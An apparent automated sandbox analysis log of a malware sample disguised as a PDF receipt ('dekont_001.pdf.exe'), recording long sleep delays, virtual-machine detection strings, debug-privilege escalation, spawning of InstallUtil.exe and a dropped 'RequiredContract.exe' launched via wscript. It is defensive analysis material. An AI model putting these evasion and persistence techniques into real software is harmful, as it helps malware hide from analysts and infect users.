              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595156s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -595046s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -594937s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -594828s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -594718s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8080Thread sleep time: -594609s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99875Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99764Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99546Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99437Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99328Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99219Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 99094Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98984Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98875Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98765Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98650Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98546Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98418Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98307Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98192Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 98029Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97921Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97812Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97703Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97594Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97469Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97359Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97250Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97140Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 97031Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96922Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96812Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96703Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96593Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96484Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96375Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96265Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96156Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 96047Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95937Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95828Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95658Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95544Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95433Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95316Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95203Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 95093Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 94984Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 94875Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 94765Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeThread delayed: delay time: 94651Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599736Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599594Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598781Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598672Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598216Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598093Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597202Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596960Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596857Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596744Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596297Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596187Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595964Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595637Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594649Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594516Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594406Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594294Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594148Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594046Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99891Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99781Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99672Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99562Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99453Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99344Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99234Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99125Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 99015Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98905Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98783Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98667Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98453Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98328Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98219Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 98095Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97969Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97844Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97734Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97625Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97515Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97406Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97297Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97187Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 97078Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96969Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96859Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96750Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96641Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96516Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96404Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96172Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 96046Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95926Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95635Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95391Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95281Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95172Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 95059Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94937Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94828Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94718Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94609Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94500Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94391Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeThread delayed: delay time: 94266Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599218Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598780Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598115Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597778Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597671Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596796Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596468Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596030Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595921Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595374Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595046Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
              Source: InstallUtil.exe, 00000007.00000002.4213478562.0000000000F1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
              Source: RequiredContract.exe, 00000006.00000002.2010883773.0000000001493000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
              Source: RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: RequiredContract.exe, 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: dekont_001.pdf.exe, 00000000.00000002.1842745906.00000000063E0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.00000000038BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qemUhAaE4tNqKKbf4eX
              Source: dekont_001.pdf.exe, 00000000.00000002.1828392738.0000000000C52000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4212777501.0000000000E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A7B70 LdrInitializeThunk,1_2_066A7B70
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\RequiredContract.exe "C:\Users\user\AppData\Roaming\RequiredContract.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeQueries volume information: C:\Users\user\Desktop\dekont_001.pdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeQueries volume information: C:\Users\user\AppData\Roaming\RequiredContract.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
